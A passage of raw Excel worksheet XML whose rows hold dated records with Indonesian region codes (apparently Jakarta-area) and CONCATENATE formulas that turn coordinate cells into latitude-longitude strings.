      <c r="D1407" t="s">
        <v>2648</v>
      </c>
      <c r="E1407" t="s">
        <v>23</v>
      </c>
      <c r="G1407" t="s">
        <v>2865</v>
      </c>
      <c r="H1407" t="s">
        <v>26</v>
      </c>
      <c r="J1407" t="s">
        <v>1572</v>
      </c>
      <c r="L1407" t="s">
        <v>2866</v>
      </c>
      <c r="M1407">
        <v>3175030001</v>
      </c>
      <c r="N1407">
        <v>3175030</v>
      </c>
      <c r="O1407">
        <v>3175</v>
      </c>
      <c r="P1407">
        <v>31</v>
      </c>
      <c r="Q1407" t="s">
        <v>1574</v>
      </c>
      <c r="R1407" t="s">
        <v>1563</v>
      </c>
      <c r="S1407" t="s">
        <v>547</v>
      </c>
      <c r="T1407" t="s">
        <v>33</v>
      </c>
      <c r="U1407" s="5">
        <v>10686028</v>
      </c>
      <c r="V1407" s="5" t="s">
        <v>15100</v>
      </c>
      <c r="W1407" s="5">
        <v>-613378</v>
      </c>
      <c r="X1407" t="s">
        <v>18579</v>
      </c>
      <c r="Y1407" t="str">
        <f t="shared" si="21"/>
        <v>-6.13378,106.86028</v>
      </c>
    </row>
    <row r="1408" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1408">
        <v>110793</v>
      </c>
      <c r="B1408" s="1">
        <v>43885</v>
      </c>
      <c r="C1408">
        <v>1</v>
      </c>
      <c r="D1408" t="s">
        <v>2648</v>
      </c>
      <c r="E1408" t="s">
        <v>23</v>
      </c>
      <c r="G1408" t="s">
        <v>2890</v>
      </c>
      <c r="H1408" t="s">
        <v>26</v>
      </c>
      <c r="J1408" t="s">
        <v>138</v>
      </c>
      <c r="L1408" t="s">
        <v>2891</v>
      </c>
      <c r="M1408">
        <v>3172080005</v>
      </c>
      <c r="N1408">
        <v>3172080</v>
      </c>
      <c r="O1408">
        <v>3172</v>
      </c>
      <c r="P1408">
        <v>31</v>
      </c>
      <c r="Q1408" t="s">
        <v>140</v>
      </c>
      <c r="R1408" t="s">
        <v>141</v>
      </c>
      <c r="S1408" t="s">
        <v>49</v>
      </c>
      <c r="T1408" t="s">
        <v>33</v>
      </c>
      <c r="U1408" s="5">
        <v>10695043</v>
      </c>
      <c r="V1408" s="5" t="s">
        <v>15110</v>
      </c>
      <c r="W1408" s="5">
        <v>-617122</v>
      </c>
      <c r="X1408" t="s">
        <v>18915</v>
      </c>
      <c r="Y1408" t="str">
        <f t="shared" si="21"/>
        <v>-6.17122,106.95043</v>
      </c>
    </row>
    <row r="1409" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1409">
        <v>110796</v>
      </c>
      <c r="B1409" s="1">
        <v>43885</v>
      </c>
      <c r="C1409">
        <v>1</v>
      </c>
      <c r="D1409" t="s">
        <v>2648</v>
      </c>
      <c r="E1409" t="s">
        <v>23</v>
      </c>
      <c r="G1409" t="s">
        <v>2897</v>
      </c>
      <c r="H1409" t="s">
        <v>26</v>
      </c>
      <c r="J1409" t="s">
        <v>2341</v>
      </c>
      <c r="L1409" t="s">
        <v>2898</v>
      </c>
      <c r="M1409">
        <v>3172070006</v>
      </c>
      <c r="N1409">
        <v>3172070</v>
      </c>
      <c r="O1409">
        <v>3172</v>
      </c>
      <c r="P1409">
        <v>31</v>
      </c>
      <c r="Q1409" t="s">
        <v>2342</v>
      </c>
      <c r="R1409" t="s">
        <v>128</v>
      </c>
      <c r="S1409" t="s">
        <v>49</v>
      </c>
      <c r="T1409" t="s">
        <v>33</v>
      </c>
      <c r="U1409" s="5">
        <v>10692936</v>
      </c>
      <c r="V1409" s="5" t="s">
        <v>15113</v>
      </c>
      <c r="W1409" s="5">
        <v>-623181</v>
      </c>
      <c r="X1409" t="s">
        <v>18603</v>
      </c>
      <c r="Y1409" t="str">
        <f t="shared" si="21"/>
        <v>-6.23181,106.92936</v>
      </c>
    </row>
    <row r="1410" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1410">
        <v>110797</v>
      </c>
      <c r="B1410" s="1">
        <v>43885</v>
      </c>
      <c r="C1410">
        <v>1</v>
      </c>
      <c r="D1410" t="s">
        <v>2648</v>
      </c>
      <c r="E1410" t="s">
        <v>23</v>
      </c>
      <c r="G1410" t="s">
        <v>2899</v>
      </c>
      <c r="H1410" t="s">
        <v>26</v>
      </c>
      <c r="J1410" t="s">
        <v>563</v>
      </c>
      <c r="L1410" t="s">
        <v>2900</v>
      </c>
      <c r="M1410">
        <v>3174010005</v>
      </c>
      <c r="N1410">
        <v>3174010</v>
      </c>
      <c r="O1410">
        <v>3174</v>
      </c>
      <c r="P1410">
        <v>31</v>
      </c>
      <c r="Q1410" t="s">
        <v>251</v>
      </c>
      <c r="R1410" t="s">
        <v>69</v>
      </c>
      <c r="S1410" t="s">
        <v>32</v>
      </c>
      <c r="T1410" t="s">
        <v>33</v>
      </c>
      <c r="U1410" s="5">
        <v>10675696</v>
      </c>
      <c r="V1410" s="5" t="s">
        <v>15114</v>
      </c>
      <c r="W1410" s="5">
        <v>-618715</v>
      </c>
      <c r="X1410" t="s">
        <v>18304</v>
      </c>
      <c r="Y1410" t="str">
        <f t="shared" si="21"/>
        <v>-6.18715,106.75696</v>
      </c>
    </row>
    <row r="1411" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1411">
        <v>110798</v>
      </c>
      <c r="B1411" s="1">
        <v>43885</v>
      </c>
      <c r="C1411">
        <v>1</v>
      </c>
      <c r="D1411" t="s">
        <v>2648</v>
      </c>
      <c r="E1411" t="s">
        <v>23</v>
      </c>
      <c r="G1411" t="s">
        <v>2862</v>
      </c>
      <c r="H1411" t="s">
        <v>26</v>
      </c>
      <c r="J1411" t="s">
        <v>2863</v>
      </c>
      <c r="L1411" t="s">
        <v>2864</v>
      </c>
      <c r="M1411">
        <v>3172020003</v>
      </c>
      <c r="N1411">
        <v>3172020</v>
      </c>
      <c r="O1411">
        <v>3172</v>
      </c>
      <c r="P1411">
        <v>31</v>
      </c>
      <c r="Q1411" t="s">
        <v>1644</v>
      </c>
      <c r="R1411" t="s">
        <v>1644</v>
      </c>
      <c r="S1411" t="s">
        <v>49</v>
      </c>
      <c r="T1411" t="s">
        <v>33</v>
      </c>
      <c r="U1411" s="5">
        <v>10688112</v>
      </c>
      <c r="V1411" s="5" t="s">
        <v>15099</v>
      </c>
      <c r="W1411" s="5">
        <v>-631856</v>
      </c>
      <c r="X1411" t="s">
        <v>18905</v>
      </c>
      <c r="Y1411" t="str">
        <f t="shared" ref="Y1411:Y1474" si="22">CONCATENATE(X1411,",",V1411)</f>
        <v>-6.31856,106.88112</v>
      </c>
    </row>
    <row r="1412" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1412">
        <v>110801</v>
      </c>
      <c r="B1412" s="1">
        <v>43885</v>
      </c>
      <c r="C1412">
        <v>1</v>
      </c>
      <c r="D1412" t="s">
        <v>2648</v>
      </c>
      <c r="E1412" t="s">
        <v>23</v>
      </c>
      <c r="G1412" t="s">
        <v>2892</v>
      </c>
      <c r="H1412" t="s">
        <v>26</v>
      </c>
      <c r="J1412" t="s">
        <v>2874</v>
      </c>
      <c r="L1412" t="s">
        <v>2794</v>
      </c>
      <c r="M1412">
        <v>3175010004</v>
      </c>
      <c r="N1412">
        <v>3175010</v>
      </c>
      <c r="O1412">
        <v>3175</v>
      </c>
      <c r="P1412">
        <v>31</v>
      </c>
      <c r="Q1412" t="s">
        <v>546</v>
      </c>
      <c r="R1412" t="s">
        <v>546</v>
      </c>
      <c r="S1412" t="s">
        <v>547</v>
      </c>
      <c r="T1412" t="s">
        <v>33</v>
      </c>
      <c r="U1412" s="5">
        <v>10679915</v>
      </c>
      <c r="V1412" s="5" t="s">
        <v>15111</v>
      </c>
      <c r="W1412" s="5">
        <v>-612797</v>
      </c>
      <c r="X1412" t="s">
        <v>18916</v>
      </c>
      <c r="Y1412" t="str">
        <f t="shared" si="22"/>
        <v>-6.12797,106.79915</v>
      </c>
    </row>
    <row r="1413" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1413">
        <v>110802</v>
      </c>
      <c r="B1413" s="1">
        <v>43885</v>
      </c>
      <c r="C1413">
        <v>1</v>
      </c>
      <c r="D1413" t="s">
        <v>2648</v>
      </c>
      <c r="E1413" t="s">
        <v>23</v>
      </c>
      <c r="G1413" t="s">
        <v>2873</v>
      </c>
      <c r="H1413" t="s">
        <v>26</v>
      </c>
      <c r="J1413" t="s">
        <v>2874</v>
      </c>
      <c r="L1413" t="s">
        <v>2794</v>
      </c>
      <c r="M1413">
        <v>3175010004</v>
      </c>
      <c r="N1413">
        <v>3175010</v>
      </c>
      <c r="O1413">
        <v>3175</v>
      </c>
      <c r="P1413">
        <v>31</v>
      </c>
      <c r="Q1413" t="s">
        <v>546</v>
      </c>
      <c r="R1413" t="s">
        <v>546</v>
      </c>
      <c r="S1413" t="s">
        <v>547</v>
      </c>
      <c r="T1413" t="s">
        <v>33</v>
      </c>
      <c r="U1413" s="5">
        <v>10679913</v>
      </c>
      <c r="V1413" s="5" t="s">
        <v>15103</v>
      </c>
      <c r="W1413" s="5">
        <v>-612795</v>
      </c>
      <c r="X1413" t="s">
        <v>18908</v>
      </c>
      <c r="Y1413" t="str">
        <f t="shared" si="22"/>
        <v>-6.12795,106.79913</v>
      </c>
    </row>
    <row r="1414" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1414">
        <v>110803</v>
      </c>
      <c r="B1414" s="1">
        <v>43885</v>
      </c>
      <c r="C1414">
        <v>1</v>
      </c>
      <c r="D1414" t="s">
        <v>2648</v>
      </c>
      <c r="E1414" t="s">
        <v>23</v>
      </c>
      <c r="G1414" t="s">
        <v>2907</v>
      </c>
      <c r="H1414" t="s">
        <v>26</v>
      </c>
      <c r="J1414" t="s">
        <v>2627</v>
      </c>
      <c r="L1414" t="s">
        <v>2908</v>
      </c>
      <c r="M1414">
        <v>3275061004</v>
      </c>
      <c r="N1414">
        <v>3275061</v>
      </c>
      <c r="O1414">
        <v>3275</v>
      </c>
      <c r="P1414">
        <v>32</v>
      </c>
      <c r="Q1414" t="s">
        <v>39</v>
      </c>
      <c r="R1414" t="s">
        <v>40</v>
      </c>
      <c r="S1414" t="s">
        <v>41</v>
      </c>
      <c r="T1414" t="s">
        <v>42</v>
      </c>
      <c r="U1414" s="5">
        <v>10699215</v>
      </c>
      <c r="V1414" s="5" t="s">
        <v>15117</v>
      </c>
      <c r="W1414" s="5">
        <v>-618838</v>
      </c>
      <c r="X1414" t="s">
        <v>18868</v>
      </c>
      <c r="Y1414" t="str">
        <f t="shared" si="22"/>
        <v>-6.18838,106.99215</v>
      </c>
    </row>
    <row r="1415" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1415">
        <v>110804</v>
      </c>
      <c r="B1415" s="1">
        <v>43885</v>
      </c>
      <c r="C1415">
        <v>1</v>
      </c>
      <c r="D1415" t="s">
        <v>2648</v>
      </c>
      <c r="E1415" t="s">
        <v>23</v>
      </c>
      <c r="G1415" t="s">
        <v>2909</v>
      </c>
      <c r="H1415" t="s">
        <v>26</v>
      </c>
      <c r="J1415" t="s">
        <v>2580</v>
      </c>
      <c r="L1415" t="s">
        <v>2910</v>
      </c>
      <c r="M1415">
        <v>3172040005</v>
      </c>
      <c r="N1415">
        <v>3172040</v>
      </c>
      <c r="O1415">
        <v>3172</v>
      </c>
      <c r="P1415">
        <v>31</v>
      </c>
      <c r="Q1415" t="s">
        <v>1351</v>
      </c>
      <c r="R1415" t="s">
        <v>281</v>
      </c>
      <c r="S1415" t="s">
        <v>49</v>
      </c>
      <c r="T1415" t="s">
        <v>33</v>
      </c>
      <c r="U1415" s="5">
        <v>10689375</v>
      </c>
      <c r="V1415" s="5" t="s">
        <v>15118</v>
      </c>
      <c r="W1415" s="5">
        <v>-624112</v>
      </c>
      <c r="X1415" t="s">
        <v>18920</v>
      </c>
      <c r="Y1415" t="str">
        <f t="shared" si="22"/>
        <v>-6.24112,106.89375</v>
      </c>
    </row>
    <row r="1416" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1416">
        <v>110805</v>
      </c>
      <c r="B1416" s="1">
        <v>43885</v>
      </c>
      <c r="C1416">
        <v>1</v>
      </c>
      <c r="D1416" t="s">
        <v>2648</v>
      </c>
      <c r="E1416" t="s">
        <v>23</v>
      </c>
      <c r="G1416" t="s">
        <v>2893</v>
      </c>
      <c r="H1416" t="s">
        <v>26</v>
      </c>
      <c r="J1416" t="s">
        <v>2894</v>
      </c>
      <c r="L1416" t="s">
        <v>2895</v>
      </c>
      <c r="M1416">
        <v>3172050003</v>
      </c>
      <c r="N1416">
        <v>3172050</v>
      </c>
      <c r="O1416">
        <v>3172</v>
      </c>
      <c r="P1416">
        <v>31</v>
      </c>
      <c r="Q1416" t="s">
        <v>2896</v>
      </c>
      <c r="R1416" t="s">
        <v>358</v>
      </c>
      <c r="S1416" t="s">
        <v>49</v>
      </c>
      <c r="T1416" t="s">
        <v>33</v>
      </c>
      <c r="U1416" s="5">
        <v>10686551</v>
      </c>
      <c r="V1416" s="5" t="s">
        <v>15112</v>
      </c>
      <c r="W1416" s="5">
        <v>-628585</v>
      </c>
      <c r="X1416" t="s">
        <v>18917</v>
      </c>
      <c r="Y1416" t="str">
        <f t="shared" si="22"/>
        <v>-6.28585,106.86551</v>
      </c>
    </row>
    <row r="1417" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1417">
        <v>110806</v>
      </c>
      <c r="B1417" s="1">
        <v>43885</v>
      </c>
      <c r="C1417">
        <v>1</v>
      </c>
      <c r="D1417" t="s">
        <v>2648</v>
      </c>
      <c r="E1417" t="s">
        <v>23</v>
      </c>
      <c r="G1417" t="s">
        <v>2918</v>
      </c>
      <c r="H1417" t="s">
        <v>26</v>
      </c>
      <c r="J1417" t="s">
        <v>2919</v>
      </c>
      <c r="L1417" t="s">
        <v>2920</v>
      </c>
      <c r="M1417">
        <v>3172090004</v>
      </c>
      <c r="N1417">
        <v>3172090</v>
      </c>
      <c r="O1417">
        <v>3172</v>
      </c>
      <c r="P1417">
        <v>31</v>
      </c>
      <c r="Q1417" t="s">
        <v>889</v>
      </c>
      <c r="R1417" t="s">
        <v>890</v>
      </c>
      <c r="S1417" t="s">
        <v>49</v>
      </c>
      <c r="T1417" t="s">
        <v>33</v>
      </c>
      <c r="U1417" s="5">
        <v>10689644</v>
      </c>
      <c r="V1417" s="5" t="s">
        <v>15121</v>
      </c>
      <c r="W1417" s="5">
        <v>-619856</v>
      </c>
      <c r="X1417" t="s">
        <v>18923</v>
      </c>
      <c r="Y1417" t="str">
        <f t="shared" si="22"/>
        <v>-6.19856,106.89644</v>
      </c>
    </row>
    <row r="1418" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1418">
        <v>110807</v>
      </c>
      <c r="B1418" s="1">
        <v>43885</v>
      </c>
      <c r="C1418">
        <v>1</v>
      </c>
      <c r="D1418" t="s">
        <v>2648</v>
      </c>
      <c r="E1418" t="s">
        <v>23</v>
      </c>
      <c r="G1418" t="s">
        <v>2915</v>
      </c>
      <c r="H1418" t="s">
        <v>26</v>
      </c>
      <c r="J1418" t="s">
        <v>2916</v>
      </c>
      <c r="L1418" t="s">
        <v>2917</v>
      </c>
      <c r="M1418">
        <v>3172040003</v>
      </c>
      <c r="N1418">
        <v>3172040</v>
      </c>
      <c r="O1418">
        <v>3172</v>
      </c>
      <c r="P1418">
        <v>31</v>
      </c>
      <c r="Q1418" t="s">
        <v>552</v>
      </c>
      <c r="R1418" t="s">
        <v>281</v>
      </c>
      <c r="S1418" t="s">
        <v>49</v>
      </c>
      <c r="T1418" t="s">
        <v>33</v>
      </c>
      <c r="U1418" s="5">
        <v>10688195</v>
      </c>
      <c r="V1418" s="5" t="s">
        <v>15120</v>
      </c>
      <c r="W1418" s="5">
        <v>-626258</v>
      </c>
      <c r="X1418" t="s">
        <v>18922</v>
      </c>
      <c r="Y1418" t="str">
        <f t="shared" si="22"/>
        <v>-6.26258,106.88195</v>
      </c>
    </row>
    <row r="1419" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1419">
        <v>110808</v>
      </c>
      <c r="B1419" s="1">
        <v>43885</v>
      </c>
      <c r="C1419">
        <v>1</v>
      </c>
      <c r="D1419" t="s">
        <v>2648</v>
      </c>
      <c r="E1419" t="s">
        <v>23</v>
      </c>
      <c r="G1419" t="s">
        <v>2921</v>
      </c>
      <c r="H1419" t="s">
        <v>26</v>
      </c>
      <c r="J1419" t="s">
        <v>2679</v>
      </c>
      <c r="L1419" t="s">
        <v>2922</v>
      </c>
      <c r="M1419">
        <v>3172090001</v>
      </c>
      <c r="N1419">
        <v>3172090</v>
      </c>
      <c r="O1419">
        <v>3172</v>
      </c>
      <c r="P1419">
        <v>31</v>
      </c>
      <c r="Q1419" t="s">
        <v>2681</v>
      </c>
      <c r="R1419" t="s">
        <v>890</v>
      </c>
      <c r="S1419" t="s">
        <v>49</v>
      </c>
      <c r="T1419" t="s">
        <v>33</v>
      </c>
      <c r="U1419" s="5">
        <v>10687637</v>
      </c>
      <c r="V1419" s="5" t="s">
        <v>15038</v>
      </c>
      <c r="W1419" s="5">
        <v>-620738</v>
      </c>
      <c r="X1419" t="s">
        <v>18850</v>
      </c>
      <c r="Y1419" t="str">
        <f t="shared" si="22"/>
        <v>-6.20738,106.87637</v>
      </c>
    </row>
    <row r="1420" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1420">
        <v>110809</v>
      </c>
      <c r="B1420" s="1">
        <v>43885</v>
      </c>
      <c r="C1420">
        <v>1</v>
      </c>
      <c r="D1420" t="s">
        <v>2648</v>
      </c>
      <c r="E1420" t="s">
        <v>23</v>
      </c>
      <c r="G1420" t="s">
        <v>2901</v>
      </c>
      <c r="H1420" t="s">
        <v>26</v>
      </c>
      <c r="J1420" t="s">
        <v>2902</v>
      </c>
      <c r="L1420" t="s">
        <v>2903</v>
      </c>
      <c r="M1420">
        <v>3172020003</v>
      </c>
      <c r="N1420">
        <v>3172020</v>
      </c>
      <c r="O1420">
        <v>3172</v>
      </c>
      <c r="P1420">
        <v>31</v>
      </c>
      <c r="Q1420" t="s">
        <v>1644</v>
      </c>
      <c r="R1420" t="s">
        <v>1644</v>
      </c>
      <c r="S1420" t="s">
        <v>49</v>
      </c>
      <c r="T1420" t="s">
        <v>33</v>
      </c>
      <c r="U1420" s="5">
        <v>10688027</v>
      </c>
      <c r="V1420" s="5" t="s">
        <v>15115</v>
      </c>
      <c r="W1420" s="5">
        <v>-631847</v>
      </c>
      <c r="X1420" t="s">
        <v>18918</v>
      </c>
      <c r="Y1420" t="str">
        <f t="shared" si="22"/>
        <v>-6.31847,106.88027</v>
      </c>
    </row>
    <row r="1421" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1421">
        <v>110810</v>
      </c>
      <c r="B1421" s="1">
        <v>43885</v>
      </c>
      <c r="C1421">
        <v>1</v>
      </c>
      <c r="D1421" t="s">
        <v>2648</v>
      </c>
      <c r="E1421" t="s">
        <v>23</v>
      </c>
      <c r="G1421" t="s">
        <v>2928</v>
      </c>
      <c r="H1421" t="s">
        <v>26</v>
      </c>
      <c r="J1421" t="s">
        <v>2929</v>
      </c>
      <c r="L1421" t="s">
        <v>2930</v>
      </c>
      <c r="M1421">
        <v>3172090002</v>
      </c>
      <c r="N1421">
        <v>3172090</v>
      </c>
      <c r="O1421">
        <v>3172</v>
      </c>
      <c r="P1421">
        <v>31</v>
      </c>
      <c r="Q1421" t="s">
        <v>2931</v>
      </c>
      <c r="R1421" t="s">
        <v>890</v>
      </c>
      <c r="S1421" t="s">
        <v>49</v>
      </c>
      <c r="T1421" t="s">
        <v>33</v>
      </c>
      <c r="U1421" s="5">
        <v>10688947</v>
      </c>
      <c r="V1421" s="5" t="s">
        <v>15123</v>
      </c>
      <c r="W1421" s="5">
        <v>-620221</v>
      </c>
      <c r="X1421" t="s">
        <v>18925</v>
      </c>
      <c r="Y1421" t="str">
        <f t="shared" si="22"/>
        <v>-6.20221,106.88947</v>
      </c>
    </row>
    <row r="1422" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1422">
        <v>110811</v>
      </c>
      <c r="B1422" s="1">
        <v>43885</v>
      </c>
      <c r="C1422">
        <v>1</v>
      </c>
      <c r="D1422" t="s">
        <v>2648</v>
      </c>
      <c r="E1422" t="s">
        <v>23</v>
      </c>
      <c r="G1422" t="s">
        <v>2904</v>
      </c>
      <c r="H1422" t="s">
        <v>26</v>
      </c>
      <c r="J1422" t="s">
        <v>2905</v>
      </c>
      <c r="L1422" t="s">
        <v>2906</v>
      </c>
      <c r="M1422">
        <v>3171090005</v>
      </c>
      <c r="N1422">
        <v>3171090</v>
      </c>
      <c r="O1422">
        <v>3171</v>
      </c>
      <c r="P1422">
        <v>31</v>
      </c>
      <c r="Q1422" t="s">
        <v>1300</v>
      </c>
      <c r="R1422" t="s">
        <v>347</v>
      </c>
      <c r="S1422" t="s">
        <v>108</v>
      </c>
      <c r="T1422" t="s">
        <v>33</v>
      </c>
      <c r="U1422" s="5">
        <v>10685985</v>
      </c>
      <c r="V1422" s="5" t="s">
        <v>15116</v>
      </c>
      <c r="W1422" s="5">
        <v>-622111</v>
      </c>
      <c r="X1422" t="s">
        <v>18919</v>
      </c>
      <c r="Y1422" t="str">
        <f t="shared" si="22"/>
        <v>-6.22111,106.85985</v>
      </c>
    </row>
    <row r="1423" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1423">
        <v>110812</v>
      </c>
      <c r="B1423" s="1">
        <v>43885</v>
      </c>
      <c r="C1423">
        <v>1</v>
      </c>
      <c r="D1423" t="s">
        <v>2648</v>
      </c>
      <c r="E1423" t="s">
        <v>23</v>
      </c>
      <c r="G1423" t="s">
        <v>2911</v>
      </c>
      <c r="H1423" t="s">
        <v>26</v>
      </c>
      <c r="J1423" t="s">
        <v>2912</v>
      </c>
      <c r="L1423" t="s">
        <v>2913</v>
      </c>
      <c r="M1423">
        <v>3172040001</v>
      </c>
      <c r="N1423">
        <v>3172040</v>
      </c>
      <c r="O1423">
        <v>3172</v>
      </c>
      <c r="P1423">
        <v>31</v>
      </c>
      <c r="Q1423" t="s">
        <v>2914</v>
      </c>
      <c r="R1423" t="s">
        <v>281</v>
      </c>
      <c r="S1423" t="s">
        <v>49</v>
      </c>
      <c r="T1423" t="s">
        <v>33</v>
      </c>
      <c r="U1423" s="5">
        <v>10688896</v>
      </c>
      <c r="V1423" s="5" t="s">
        <v>15119</v>
      </c>
      <c r="W1423" s="5">
        <v>-629507</v>
      </c>
      <c r="X1423" t="s">
        <v>18921</v>
      </c>
      <c r="Y1423" t="str">
        <f t="shared" si="22"/>
        <v>-6.29507,106.88896</v>
      </c>
    </row>
    <row r="1424" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1424">
        <v>110813</v>
      </c>
      <c r="B1424" s="1">
        <v>43885</v>
      </c>
      <c r="C1424">
        <v>1</v>
      </c>
      <c r="D1424" t="s">
        <v>2648</v>
      </c>
      <c r="E1424" t="s">
        <v>23</v>
      </c>
      <c r="G1424" t="s">
        <v>2923</v>
      </c>
      <c r="H1424" t="s">
        <v>26</v>
      </c>
      <c r="J1424" t="s">
        <v>2679</v>
      </c>
      <c r="L1424" t="s">
        <v>2924</v>
      </c>
      <c r="M1424">
        <v>3172090001</v>
      </c>
      <c r="N1424">
        <v>3172090</v>
      </c>
      <c r="O1424">
        <v>3172</v>
      </c>
      <c r="P1424">
        <v>31</v>
      </c>
      <c r="Q1424" t="s">
        <v>2681</v>
      </c>
      <c r="R1424" t="s">
        <v>890</v>
      </c>
      <c r="S1424" t="s">
        <v>49</v>
      </c>
      <c r="T1424" t="s">
        <v>33</v>
      </c>
      <c r="U1424" s="5">
        <v>10687637</v>
      </c>
      <c r="V1424" s="5" t="s">
        <v>15038</v>
      </c>
      <c r="W1424" s="5">
        <v>-620737</v>
      </c>
      <c r="X1424" t="s">
        <v>18843</v>
      </c>
      <c r="Y1424" t="str">
        <f t="shared" si="22"/>
        <v>-6.20737,106.87637</v>
      </c>
    </row>
    <row r="1425" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1425">
        <v>110972</v>
      </c>
      <c r="B1425" s="1">
        <v>43885</v>
      </c>
      <c r="C1425">
        <v>1</v>
      </c>
      <c r="D1425" t="s">
        <v>2648</v>
      </c>
      <c r="E1425" t="s">
        <v>23</v>
      </c>
      <c r="G1425" t="s">
        <v>2937</v>
      </c>
      <c r="H1425" t="s">
        <v>26</v>
      </c>
      <c r="J1425" t="s">
        <v>1297</v>
      </c>
      <c r="L1425" t="s">
        <v>2938</v>
      </c>
      <c r="M1425">
        <v>3171090005</v>
      </c>
      <c r="N1425">
        <v>3171090</v>
      </c>
      <c r="O1425">
        <v>3171</v>
      </c>
      <c r="P1425">
        <v>31</v>
      </c>
      <c r="Q1425" t="s">
        <v>1300</v>
      </c>
      <c r="R1425" t="s">
        <v>347</v>
      </c>
      <c r="S1425" t="s">
        <v>108</v>
      </c>
      <c r="T1425" t="s">
        <v>33</v>
      </c>
      <c r="U1425" s="5">
        <v>10686005</v>
      </c>
      <c r="V1425" s="5" t="s">
        <v>15126</v>
      </c>
      <c r="W1425" s="5">
        <v>-622081</v>
      </c>
      <c r="X1425" t="s">
        <v>18928</v>
      </c>
      <c r="Y1425" t="str">
        <f t="shared" si="22"/>
        <v>-6.22081,106.86005</v>
      </c>
    </row>
    <row r="1426" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1426">
        <v>110976</v>
      </c>
      <c r="B1426" s="1">
        <v>43885</v>
      </c>
      <c r="C1426">
        <v>1</v>
      </c>
      <c r="D1426" t="s">
        <v>2648</v>
      </c>
      <c r="E1426" t="s">
        <v>23</v>
      </c>
      <c r="G1426" t="s">
        <v>2932</v>
      </c>
      <c r="H1426" t="s">
        <v>26</v>
      </c>
      <c r="J1426" t="s">
        <v>2933</v>
      </c>
      <c r="L1426" t="s">
        <v>2934</v>
      </c>
      <c r="M1426">
        <v>3171100006</v>
      </c>
      <c r="N1426">
        <v>3171100</v>
      </c>
      <c r="O1426">
        <v>3171</v>
      </c>
      <c r="P1426">
        <v>31</v>
      </c>
      <c r="Q1426" t="s">
        <v>1121</v>
      </c>
      <c r="R1426" t="s">
        <v>107</v>
      </c>
      <c r="S1426" t="s">
        <v>108</v>
      </c>
      <c r="T1426" t="s">
        <v>33</v>
      </c>
      <c r="U1426" s="5">
        <v>10683842</v>
      </c>
      <c r="V1426" s="5" t="s">
        <v>15124</v>
      </c>
      <c r="W1426" s="5">
        <v>-620878</v>
      </c>
      <c r="X1426" t="s">
        <v>18926</v>
      </c>
      <c r="Y1426" t="str">
        <f t="shared" si="22"/>
        <v>-6.20878,106.83842</v>
      </c>
    </row>
    <row r="1427" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1427">
        <v>110986</v>
      </c>
      <c r="B1427" s="1">
        <v>43885</v>
      </c>
      <c r="C1427">
        <v>0</v>
      </c>
      <c r="D1427" t="s">
        <v>2648</v>
      </c>
      <c r="E1427" t="s">
        <v>23</v>
      </c>
      <c r="G1427" t="s">
        <v>2925</v>
      </c>
      <c r="H1427" t="s">
        <v>26</v>
      </c>
      <c r="J1427" t="s">
        <v>2926</v>
      </c>
      <c r="L1427" t="s">
        <v>2927</v>
      </c>
      <c r="M1427">
        <v>3175060004</v>
      </c>
      <c r="N1427">
        <v>3175060</v>
      </c>
      <c r="O1427">
        <v>3175</v>
      </c>
      <c r="P1427">
        <v>31</v>
      </c>
      <c r="Q1427" t="s">
        <v>2279</v>
      </c>
      <c r="R1427" t="s">
        <v>2279</v>
      </c>
      <c r="S1427" t="s">
        <v>547</v>
      </c>
      <c r="T1427" t="s">
        <v>33</v>
      </c>
      <c r="U1427" s="5">
        <v>10693919</v>
      </c>
      <c r="V1427" s="5" t="s">
        <v>15122</v>
      </c>
      <c r="W1427" s="5">
        <v>-610246</v>
      </c>
      <c r="X1427" t="s">
        <v>18924</v>
      </c>
      <c r="Y1427" t="str">
        <f t="shared" si="22"/>
        <v>-6.10246,106.93919</v>
      </c>
    </row>
    <row r="1428" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1428">
        <v>110988</v>
      </c>
      <c r="B1428" s="1">
        <v>43885</v>
      </c>
      <c r="C1428">
        <v>0</v>
      </c>
      <c r="D1428" t="s">
        <v>2648</v>
      </c>
      <c r="E1428" t="s">
        <v>23</v>
      </c>
      <c r="G1428" t="s">
        <v>2935</v>
      </c>
      <c r="H1428" t="s">
        <v>26</v>
      </c>
      <c r="J1428" t="s">
        <v>138</v>
      </c>
      <c r="L1428" t="s">
        <v>2936</v>
      </c>
      <c r="M1428">
        <v>3172080005</v>
      </c>
      <c r="N1428">
        <v>3172080</v>
      </c>
      <c r="O1428">
        <v>3172</v>
      </c>
      <c r="P1428">
        <v>31</v>
      </c>
      <c r="Q1428" t="s">
        <v>140</v>
      </c>
      <c r="R1428" t="s">
        <v>141</v>
      </c>
      <c r="S1428" t="s">
        <v>49</v>
      </c>
      <c r="T1428" t="s">
        <v>33</v>
      </c>
      <c r="U1428" s="5">
        <v>10695105</v>
      </c>
      <c r="V1428" s="5" t="s">
        <v>15125</v>
      </c>
      <c r="W1428" s="5">
        <v>-617004</v>
      </c>
      <c r="X1428" t="s">
        <v>18927</v>
      </c>
      <c r="Y1428" t="str">
        <f t="shared" si="22"/>
        <v>-6.17004,106.95105</v>
      </c>
    </row>
    <row r="1429" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1429">
        <v>108952</v>
      </c>
      <c r="B1429" s="1">
        <v>43886</v>
      </c>
      <c r="C1429">
        <v>0</v>
      </c>
      <c r="D1429" t="s">
        <v>22</v>
      </c>
      <c r="E1429" t="s">
        <v>23</v>
      </c>
      <c r="F1429" t="s">
        <v>4981</v>
